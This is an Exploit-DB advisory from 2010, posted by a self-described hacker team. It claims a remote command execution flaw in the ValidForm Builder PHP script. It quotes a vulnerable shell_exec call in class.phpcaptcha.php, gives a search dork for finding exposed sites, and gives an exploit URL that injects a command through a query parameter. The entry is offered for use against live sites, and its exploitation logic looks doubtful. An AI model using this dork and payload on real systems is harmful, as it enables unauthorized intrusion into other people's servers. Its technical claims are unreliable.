ValidForm Builder script - Remote Command Execution

EDB-ID:

14454

CVE:

N/A




Platform:

PHP

Date:

2010-07-23


# Exploit Title:   ValidForm Builder script Remote Command Execution
Vulnerability
# Date: 2010/07/23
# Author: HackeR aRaR
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script:
http://validformbuilder.googlecode.com/files/validformbuilder_v.1.0.zip
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
#ViRuS Qalaa:em9@live.com <Qalaa%3Aem9@live.com>
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
shell_exec("$this->sFlitePath -t \"$sText\" -o
$this->sAudioPath$sFile.wav");
/libraries/ValidForm/class.phpcaptcha.php
Line:466

----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"

http://{localhost}/{path}/libraries/ValidForm/class.phpcaptcha.php?this=id<http://%7blocalhost%7d/%7Bpath%7D/libraries/ValidForm/class.phpcaptcha.php?this=id>

---------greatz----------
Greatz to :
ViRuS Qalaa,VoLc4n0

and My friends Others and My friends in MSN
EnJoY o_O